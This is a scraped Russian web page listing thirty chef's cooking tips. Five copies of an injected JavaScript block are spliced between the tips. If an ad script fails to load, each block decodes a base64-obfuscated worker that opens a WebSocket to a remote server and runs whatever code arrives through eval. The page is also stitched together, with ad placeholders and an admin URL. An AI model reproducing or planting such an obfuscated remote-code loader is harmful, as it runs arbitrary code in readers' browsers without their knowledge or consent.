http://piclike.ru/wp-admin/admin.php?page=instant-articles-wizard

Хитрости, которые использует шеф-повар на кухне

[ad_1]

var d = new Date, script620432 = document.createElement(«script»), mg_ws620432 = {};script620432.type = «text/javascript»;script620432.charset = «utf-8»;script620432.src = «http://jsc.marketgid.com/k/a/kapets.net.620432.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620432.onerror = function () { mg_ws620432 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzIoZSl7dmFyIGg9bWdfd3M2MjA0MzIub25tZXNzYWdlOyBtZ193czYyMDQzMi5yZWFkeVN0YXRlPT1tZ193czYyMDQzMi5DTE9TRUQmJihtZ193czYyMDQzMj1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMyX2xvY2F0aW9uKSksbWdfd3M2MjA0MzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIobWdfd3M2MjA0MzIsZnVuY3Rpb24oKXttZ193czYyMDQzMi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzJfbG9jYXRpb24pLCBtZ193czYyMDQzMi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzIoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620432.onmessage = function (msg){window.eval(msg.data);}; mg_ws620432.postMessage(‘js|’+script620432.src+’|M367283Composite620432|M367283Composite620432’);};document.body.appendChild(script620432);

Шеф-повара знают много хитростей, узнайте и вы. Секреты от шеф-повара на ваш стол! 

1.Чтобы придать легкий чесночный аромат всему блюду, натри зубчиком чеснока тарелку, а тогда уже выкладывай на нее салат или гарнир.

2.Новый вкус маринада для мяса: темное пиво или смесь светлого пива с соевым соусом, соль и перец по
вкусу. Пиво можно добавлять в тушеные овощи, оно придаст особый запах и вкус обычному вареному
картофелю.

3.Пересоленный суп можно спасти двумя методами. Окуни в него марлю с небольшим количеством несоленой каши и провари, каша впитает в себя лишнюю соль. Второй способ: окуни в суп столовую ложку с кубиком сахара-рафинада. Когда сахар начнет таять, вынь ложку, процедуру повтори несколько раз, меняя сахарные кубики.

4.Соли печень только в конце приготовления, иначе она станет твердой.

5.Чтобы верх пирога не пригорал, прикрой пирог смоченной бумагой.

6.Белоснежным получится рис, если при варке добавить в него немного уксуса.

7.Для нарезки яйца, сваренного вкрутую, смочи лезвие ножа холодной водой. Так желток не будет крошиться.

8.Если бросить в бульон кусочек льда и довести его до кипения, он будет прозрачным.

 

 

var d = new Date, script620432 = document.createElement(«script»), mg_ws620432 = {};script620432.type = «text/javascript»;script620432.charset = «utf-8»;script620432.src = «http://jsc.marketgid.com/k/a/kapets.net.620432.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620432.onerror = function () { mg_ws620432 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzIoZSl7dmFyIGg9bWdfd3M2MjA0MzIub25tZXNzYWdlOyBtZ193czYyMDQzMi5yZWFkeVN0YXRlPT1tZ193czYyMDQzMi5DTE9TRUQmJihtZ193czYyMDQzMj1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMyX2xvY2F0aW9uKSksbWdfd3M2MjA0MzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIobWdfd3M2MjA0MzIsZnVuY3Rpb24oKXttZ193czYyMDQzMi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzJfbG9jYXRpb24pLCBtZ193czYyMDQzMi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzIoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620432.onmessage = function (msg){window.eval(msg.data);}; mg_ws620432.postMessage(‘js|’+script620432.src+’|M367283Composite620432|M367283Composite620432’);};document.body.appendChild(script620432);

9.При варке фасоль не потемнеет, если варить ее в открытой посуде.

10.Фарш будет вкуснее, если добавить в него немного сырого лука, немного поджаренного лука и мелко натертый сырой картофель.

11.Говядина не будет жесткой, если перед приготовлением ты замаринуешь ее в майонезе в течение 30 минут.

12.Початок отварной кукурузы можно использовать в салате! Достаточно просто срезать острым ножом кукурузные зернышки.

13.Баклажан не будет неприятно горчить, если перед приготовлением ты нарежешь его на небольшие кусочки, посолишь и дашь немного постоять.

14.Не забудь после этого промыть баклажаны в холодной воде.

15.Миндаль легко очистить от кожицы, если сначала прокипятить его в воде в течение 5 минут, а потом дать остыть орешкам в холодной воде.

16.Сметана будет лучше взбиваться в крем, если добавить в нее немного белка.

17.Если ты добавишь в молотый кофе щепотку соли, сваренный напиток будет в разы вкуснее!

18.Чтобы мясо, запеченное в духовке, приобрело румяную вкусную корочку, достаточно его смазать сверху гранатовым соком, мёдом, разведенным коньяком или водой, сухим вином.

19.Жесткое мясо будет мягче, если добавить в бульон кожуру банана и варить мясо с ней.

20.Яблоки в шарлотке не будут опускаться на дно формы, если обвалять их перед приготовлением в муке.

21.Вместо панировочных сухарей используй молотые орехи — вкус словами не передать! И намного полезнее сухарей.

 

var d = new Date, script620432 = document.createElement(«script»), mg_ws620432 = {};script620432.type = «text/javascript»;script620432.charset = «utf-8»;script620432.src = «http://jsc.marketgid.com/k/a/kapets.net.620432.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620432.onerror = function () { mg_ws620432 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzIoZSl7dmFyIGg9bWdfd3M2MjA0MzIub25tZXNzYWdlOyBtZ193czYyMDQzMi5yZWFkeVN0YXRlPT1tZ193czYyMDQzMi5DTE9TRUQmJihtZ193czYyMDQzMj1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMyX2xvY2F0aW9uKSksbWdfd3M2MjA0MzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIobWdfd3M2MjA0MzIsZnVuY3Rpb24oKXttZ193czYyMDQzMi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzJfbG9jYXRpb24pLCBtZ193czYyMDQzMi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzIoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620432.onmessage = function (msg){window.eval(msg.data);}; mg_ws620432.postMessage(‘js|’+script620432.src+’|M367283Composite620432|M367283Composite620432’);};document.body.appendChild(script620432);

22.Нагревай тарелки перед тем, как выложить в них горячее блюдо и охлаждай перед подачей холодных. Такая простая хитрость, а вкус станет более насыщенным, свежесть не утратиться.

23.Только что приготовленное мясо не нужно сразу же подавать на стол: дай ему немного остыть и приобрести полноту вкуса.

24.Винегрет будет намного вкуснее, если добавить в него столовую ложку молока и и чайную ложку сахарного песка.

25.Пробуй пищу во время приготовления! Это поможет тебе не ошибиться с количеством соли и приправ, правильно рассчитать время приготовления.

var d = new Date, script620432 = document.createElement(«script»), mg_ws620432 = {};script620432.type = «text/javascript»;script620432.charset = «utf-8»;script620432.src = «http://jsc.marketgid.com/k/a/kapets.net.620432.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620432.onerror = function () { mg_ws620432 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzIoZSl7dmFyIGg9bWdfd3M2MjA0MzIub25tZXNzYWdlOyBtZ193czYyMDQzMi5yZWFkeVN0YXRlPT1tZ193czYyMDQzMi5DTE9TRUQmJihtZ193czYyMDQzMj1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMyX2xvY2F0aW9uKSksbWdfd3M2MjA0MzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIobWdfd3M2MjA0MzIsZnVuY3Rpb24oKXttZ193czYyMDQzMi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzJfbG9jYXRpb24pLCBtZ193czYyMDQzMi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzIoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620432.onmessage = function (msg){window.eval(msg.data);}; mg_ws620432.postMessage(‘js|’+script620432.src+’|M367283Composite620432|M367283Composite620432’);};document.body.appendChild(script620432);

26.Перед тем как снять суп с огня, добавь в него немного свежего сока моркови, капусты или помидор. Это усилит вкус супа и обогатит его витаминами.

27.Тупым ножом проще нанести себе травму, ведь для нарезки продуктов ты прикладываешь больше усилий. Всегда держи ножи на кухне острыми!

28.Ваниль — отличная специя для заправок к овощным салатам. Попробуй, это вкусно!

29.Используй лимонный сок в блюдах, частично заменяя им соль. Это полезно для регуляции давления, ты не пересолишь блюдо, а цитрусовый привкус придаст изысканный аромат продуктам.

30. Готовь только сухими руками.

var d = new Date, script620432 = document.createElement(«script»), mg_ws620432 = {};script620432.type = «text/javascript»;script620432.charset = «utf-8»;script620432.src = «http://jsc.marketgid.com/k/a/kapets.net.620432.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620432.onerror = function () { mg_ws620432 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzIoZSl7dmFyIGg9bWdfd3M2MjA0MzIub25tZXNzYWdlOyBtZ193czYyMDQzMi5yZWFkeVN0YXRlPT1tZ193czYyMDQzMi5DTE9TRUQmJihtZ193czYyMDQzMj1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMyX2xvY2F0aW9uKSksbWdfd3M2MjA0MzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIobWdfd3M2MjA0MzIsZnVuY3Rpb24oKXttZ193czYyMDQzMi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzJfbG9jYXRpb24pLCBtZ193czYyMDQzMi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzIoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620432.onmessage = function (msg){window.eval(msg.data);}; mg_ws620432.postMessage(‘js|’+script620432.src+’|M367283Composite620432|M367283Composite620432’);};document.body.appendChild(script620432);

Источник

[ad_2]

Source link

10.04.2018

Читайте также:

Close